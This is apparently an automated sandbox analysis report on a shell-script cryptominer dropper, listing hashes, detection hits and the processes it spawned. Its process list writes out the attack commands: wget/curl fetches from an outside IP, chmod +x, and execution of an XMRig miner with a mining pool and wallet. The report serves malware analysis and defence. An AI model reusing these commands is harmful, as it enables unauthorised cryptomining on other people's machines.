Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:53
Static task
static1
Behavioral task
behavioral1
Sample
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
-
Size
700B
-
MD5
c4d089011765cf8fa828d28b6eeeac3e
-
SHA1
43d933e706b0eefd0db2b5acba19205ebc1af2bd
-
SHA256
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19
-
SHA512
3f55a27fc44062f48d0ee1c11c7b2ece0d3478e89744618d337dd2854b3b68e7e6161d0e38e21b32b4f85a1ee2d2fb523c7b94cc984fdff36ef65a9ddf45bae9
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral3/files/fstream-1.dat family_xmrig behavioral3/files/fstream-1.dat xmrig -
File and Directory Permissions Modification 1 TTPs 22 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 852 chmod 879 chmod 840 chmod 869 chmod 823 chmod 828 chmod 829 chmod 835 chmod 845 chmod 846 chmod 851 chmod 862 chmod 811 chmod 822 chmod 863 chmod 868 chmod 834 chmod 856 chmod 874 chmod 880 chmod 809 chmod 810 chmod -
Executes dropped EXE 13 IoCs
ioc pid Process /.__min__c 815 .__min__c /.__min__ 817 .__min__ /.__min__c 824 .__min__c /.__min__c 830 .__min__c /.__min__c 836 .__min__c /.__min__ 842 .__min__ /.__min__c 847 .__min__c /.__min__c 853 .__min__c /.__min__ 858 .__min__ /.__min__c 864 .__min__c /.__min__c 870 .__min__c /.__min__ 876 .__min__ /.__min__c 881 .__min__c -
resource yara_rule behavioral3/files/fstream-2.dat upx -
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/devices/system/cpu nproc -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 817 .__min__ 842 .__min__ 858 .__min__ 876 .__min__
Processes
-
/tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh/tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh1⤵PID:700
-
/usr/bin/wgetwget 205.185.117.101/log2 -O /dev/null2⤵PID:702
-
-
/usr/bin/curlcurl -L 205.185.117.101/log2 -o /dev/null2⤵
- Reads runtime system information
PID:719
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:727
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:804
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:805
-
-
/bin/chmodchmod +x /.__min__2⤵
- File and Directory Permissions Modification
PID:809
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:810
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:811
-
-
/usr/bin/nprocnproc --all2⤵
- Enumerates kernel/hardware configuration
PID:812
-
-
/bin/hostnamehostname2⤵PID:814
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:815
-
-
/.__min__/.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:817
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:819
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:820
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:821
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:822
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:823
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:824
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:826
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:827
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:828
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:829
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:830
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:832
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:833
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:834
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:835
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:836
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:838
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:839
-
-
/bin/chmodchmod +x /.__min__2⤵
- File and Directory Permissions Modification
PID:840
-
-
/bin/hostnamehostname2⤵PID:841
-
-
/.__min__/.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:842
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:844
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:845
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:846
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:847
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:849
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:850
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:851
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:852
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:853
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:855
-
-
/bin/chmodchmod +x /.__min__2⤵
- File and Directory Permissions Modification
PID:856
-
-
/bin/hostnamehostname2⤵PID:857
-
-
/.__min__/.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:858
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:860
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:861
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:862
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:863
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:864
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:866
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:867
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:868
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:869
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:870
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:872
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:873
-
-
/bin/chmodchmod +x /.__min__2⤵
- File and Directory Permissions Modification
PID:874
-
-
/bin/hostnamehostname2⤵PID:875
-
-
/.__min__/.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:878
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:879
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:880
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:881
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:883
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:884
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8.2MB
MD58f96e8b4e9d26884c776c1b42a70bae5
SHA153a4166052211abf77e1edf0d71c7a6faae12cc5
SHA2565e5fd0bc5f1bd663d7ccc2695c2b56bd382df3c7fdac605eb0ce3c0d5df24dc4
SHA5124709a5ee74cf3e91472b64891eaf9cd7cd8bde6059be6fd892863274c505fd3cf5f5631d66d01ab645406adb76b6123d287d97e90a6c08bf8f8a935a6624dcec
-
Filesize
4.6MB
MD5a9667595bdc8bbe37b6365102751fe19
SHA1c2f53c873c3a0ae9939595fcea6c07bfc8573ace
SHA256a99f1e801f9109a1381b10f2651a3a76a8c490e7ab778258521c787bcecb3689
SHA51221b9db3ad2116228853454f248082af8de637fcec4594ddabb66697c9a14a0a7aeff0618e259a2008b73abd6c23c8348c327b36cd830b4a444996a6bd488a69f
-
Filesize
1.6MB
MD5d3e378df1f5f920faaf9ef9e14a54f55
SHA1b039ff3865762819392cec53eeac7c8ee0a630c3
SHA25658fa45ce3665fd665bde9589297a5a34c8df403e8732eb7bdc77d00c669fac29
SHA51240ad13e858412d4d809d5eccb55c4e31ab65183f9064daea2d2b5e5bb311de4d43121337bb523ff1128cb9bd61319367de7e62f96ed2065b680f53371623d358
-
Filesize
2.9MB
MD5d98aa7684a42d8197b0eb2946c6d4fab
SHA1a5a7cb1c92f7c9ce302caaaab7d52f70ce7564da
SHA256bacd68209fed7455e465c223d55af9574e23616f94e52c1c10ee7a1b8673898e
SHA512e2cce2d0e96546bfe233e8294d49ed020db89c2a5968e57a2d84b9cd02cf71060805d765050792d81d0a238cf22eb41a030d6364256115bba5f43cb40f99b1ee